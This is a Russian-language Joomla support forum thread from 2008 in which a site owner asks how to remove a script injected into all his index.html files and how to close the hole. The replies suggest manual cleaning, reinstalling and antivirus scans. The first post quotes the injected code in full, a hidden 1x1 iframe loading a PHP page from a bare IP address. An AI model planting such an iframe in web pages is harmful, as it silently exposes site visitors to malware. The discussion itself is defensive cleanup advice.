Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

Тема в разделе "Вопросы безопасности", создана пользователем stratosfera, 20.01.2008.

  1. Offline

    stratosfera Недавно здесь

    Регистрация:
    20.01.2008
    Сообщения:
    4
    Симпатии:
    0
    Столкнулся третий раз уже с эой проблемой. 2 разных хостинга.
    Во всех файлах index.html появился скрипт:
    <iframe src='http://68.178.194.64/tab.php' width='1' height='1' style='visibility: hidden;'></iframe>
    Как можно вычестить его не прибегая к переустановки архива сайта?
    Где эти дырки и можно ли их закрыть?
    Связано ли это с атрибутами файлов на сервере? (то того как я не поменял атрибуты (разрешил перезапись) все было нормально)
    Подскажите, кто решал уже эти проблемы пожалуста.
    Версия джумлы 1.0.12 RE
    Установленые компоненты и модули:

    JOOMLA_com_easybook_1.1_stable_easy-joomla
    Joomlaboard_1[1].1.5.2_full_re
    mod_analogclock
     
    stratosfera, 20.01.2008
    #1

  2. Наши спонсоры

     
  3. Dead Krolik
    Offline

    Dead Krolik Недавно здесь => Cпециалист <=

    Регистрация:
    13.04.2007
    Сообщения:
    3 685
    Симпатии:
    101
    Пол:
    Мужской
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Как найти зараженный файл - рассказано в факе. Как найти дырки - уже сложнее. Надо смотреть сайты соответствующих компонент что бы выяснить через что поломали.
     
    Dead Krolik, 20.01.2008
    #2
  4. Offline

    stratosfera Недавно здесь

    Регистрация:
    20.01.2008
    Сообщения:
    4
    Симпатии:
    0
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Так искать вроде и не надо, все же файлы переделаны index.html. Как их вычестить? Вручную по одному или есть другой способ?
    а ссылку на фак можно?

    Добавлено через 23 часа 56 минут
    Никто не поможет советом? Ребятки помощь нужна, поделитесь опытом пожалуйста. Я недавно занимаюсь разработкой на джумле и опыта совсем нету...
     
    Последнее редактирование: 21.01.2008
    stratosfera, 21.01.2008
    #3
  5. Fanamura
    Offline

    Fanamura Доброта

    Регистрация:
    12.03.2007
    Сообщения:
    5 094
    Симпатии:
    158
    Пол:
    Мужской
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Открываете зараженные файлы в редакторе, удаляете код, сохраняете:)
    ==
    ССЫЛКА НА FAQ
     
    Fanamura, 21.01.2008
    #4
  6. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 311
    Симпатии:
    375
    Пол:
    Мужской
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    ну проще то заново записать эти файлы
     
    OlegM, 21.01.2008
    #5
  7. Offline

    stratosfera Недавно здесь

    Регистрация:
    20.01.2008
    Сообщения:
    4
    Симпатии:
    0
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

     
    stratosfera, 21.01.2008
    #6
  8. chilly_bang
    Offline

    chilly_bang Недавно здесь => Cпециалист <=

    Регистрация:
    30.04.2006
    Сообщения:
    1 541
    Симпатии:
    38
    Пол:
    Мужской
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    сохрани дамп базы данных, переинсталлируй всё.
     
    chilly_bang, 22.01.2008
    #7
  9. Offline

    stratosfera Недавно здесь

    Регистрация:
    20.01.2008
    Сообщения:
    4
    Симпатии:
    0
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Слил сайт к себе на локальную машину, вычестил все файлы с помощью редактора
    Залил все обратно, все вроде работает. Проверил свой комп другим антивирусом и нашел пару троянов.
    Хостеры посоветовали не хранить пароли в тотале, потому что именно эти трояны и могли воспользовать паролями для изменения скрипта.
     
    stratosfera, 22.01.2008
    #8
  10. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 311
    Симпатии:
    375
    Пол:
    Мужской
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Просто надо пользоваться правильным антивирусом с обновляемыми базами, а осла IE давно пора отправить в топку.
     
    OlegM, 22.01.2008
    #9
  11. Offline

    kuzmitch Недавно здесь

    Регистрация:
    06.02.2008
    Сообщения:
    77
    Симпатии:
    1
    Пол:
    Мужской
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Если скрипт появится снова гляди сюда! там мое последнее сообщение мот поможет в твоей проблеме! http://joomla-support.ru/thread/3370/
     
    Последнее редактирование модератором: 31.03.2014
    kuzmitch, 07.02.2008
    #10
  12. RoMcHuS
    Offline

    RoMcHuS Пользователь

    Регистрация:
    06.11.2006
    Сообщения:
    34
    Симпатии:
    0
    Пол:
    Мужской
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Вообще это может быть только из-за дырявого хостинга или из-за вирусняков на своейже машине, прям при закачке и меняет в коде... касперыч помогает...

    а для быстрой замены есть программка, которая ищет файлы с куском кода и заменяет его нужный (например пробел)...
    Rename4u вроде
     
    RoMcHuS, 07.02.2008
    #11
< Восстановление паролья к админцентру (Super Administrator password) | Что сделать по минимуму для новичка для безопасности >

Поделиться этой страницей

Загрузка...